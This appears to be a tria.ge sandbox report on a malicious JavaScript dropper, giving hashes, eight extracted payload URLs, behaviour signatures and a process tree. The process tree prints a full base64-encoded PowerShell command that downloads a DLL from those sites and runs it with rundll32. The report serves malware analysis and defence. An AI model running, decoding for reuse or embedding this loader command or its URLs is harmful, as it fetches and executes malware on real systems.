Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
31s -
max time network
34s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
16/03/2023, 07:13
Static task
static1
Behavioral task
behavioral1
Sample
rCoA.js
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
rCoA.js
Resource
win10v2004-20230220-en
General
-
Target
rCoA.js
-
Size
84KB
-
MD5
9f9c96d904107988f9228890f0ca30d5
-
SHA1
16f7c265d11ea75cb62345555c51073526a6c762
-
SHA256
aaae46d614933d1f6d932e3ec9b76902ab2d5788a41e7e97858aa637b86f5233
-
SHA512
cec6f9e4eec258f2f988afeaa0a4ce7a9fdd7d1d3839fa23e318f17374e784fb3d9958807a9ae24781af90fa1ab414390c59061a18f88c6c9af22d6c24073734
-
SSDEEP
1536:g43+92oVhnGoW/bLBiVuuCHGHHfYLS0dwPphjiG5yE:TOrnn2P8V6mf65ds3P
Malware Config
Extracted
https://dimoparkhogar.com/7VQuf/1
https://fondationjoelkrasso.org/rjzgP6/1
https://lamired.com/8FIz2P/1
https://kotogadang-pusako.com/MweGD/1
https://laposadadeugartearequipa.com/NARKhE/1
https://earnforpak.com/CzIUp/1
https://cocovedaglobal.com/XBtcjkQ/1
https://accesstelematics.com/Ulo3MpM/1
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2024 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2024 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2036 wrote to memory of 2024 2036 wscript.exe 28 PID 2036 wrote to memory of 2024 2036 wscript.exe 28 PID 2036 wrote to memory of 2024 2036 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\rCoA.js1⤵
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgA7ACQAYQBuAGEAYwByAG8AdABpAHMAbQBVAG4AZABlAHIAcwB1AHAAcABsAHkAaQBuAGcAIAA9ACAAKAAiAGgAdAB0AHAAcwA6AC8ALwBkAGkAbQBvAHAAYQByAGsAaABvAGcAYQByAC4AYwBvAG0ALwA3AFYAUQB1AGYALwAxACwAaAB0AHQAcABzADoALwAvAGYAbwBuAGQAYQB0AGkAbwBuAGoAbwBlAGwAawByAGEAcwBzAG8ALgBvAHIAZwAvAHIAagB6AGcAUAA2AC8AMQAsAGgAdAB0AHAAcwA6AC8ALwBsAGEAbQBpAHIAZQBkAC4AYwBvAG0ALwA4AEYASQB6ADIAUAAvADEALABoAHQAdABwAHMAOgAvAC8AawBvAHQAbwBnAGEAZABhAG4AZwAtAHAAdQBzAGEAawBvAC4AYwBvAG0ALwBNAHcAZQBHAEQALwAxACwAaAB0AHQAcABzADoALwAvAGwAYQBwAG8AcwBhAGQAYQBkAGUAdQBnAGEAcgB0AGUAYQByAGUAcQB1AGkAcABhAC4AYwBvAG0ALwBOAEEAUgBLAGgARQAvADEALABoAHQAdABwAHMAOgAvAC8AZQBhAHIAbgBmAG8AcgBwAGEAawAuAGMAbwBtAC8AQwB6AEkAVQBwAC8AMQAsAGgAdAB0AHAAcwA6AC8ALwBjAG8AYwBvAHYAZQBkAGEAZwBsAG8AYgBhAGwALgBjAG8AbQAvAFgAQgB0AGMAagBrAFEALwAxACwAaAB0AHQAcABzADoALwAvAGEAYwBjAGUAcwBzAHQAZQBsAGUAbQBhAHQAaQBjAHMALgBjAG8AbQAvAFUAbABvADMATQBwAE0ALwAxACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAGQAZQB2AG8AbABhAHQAaQBsAGkAcwBpAG4AZwBQAHUAZgBmAGIAYQBsAGwAIABpAG4AIAAkAGEAbgBhAGMAcgBvAHQAaQBzAG0AVQBuAGQAZQByAHMAdQBwAHAAbAB5AGkAbgBnACkAIAB7AHQAcgB5ACAAewBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAGQAZQB2AG8AbABhAHQAaQBsAGkAcwBpAG4AZwBQAHUAZgBmAGIAYQBsAGwAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAIAAxADUAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAFMAZQBwAGkAbwBsAGEALgBkAGwAbAA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAFMAZQBwAGkAbwBsAGEALgBkAGwAbAApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABTAGUAcABpAG8AbABhAC4AZABsAGwALABYAFMAOAA4ADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgA7AH0AfQA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2024
-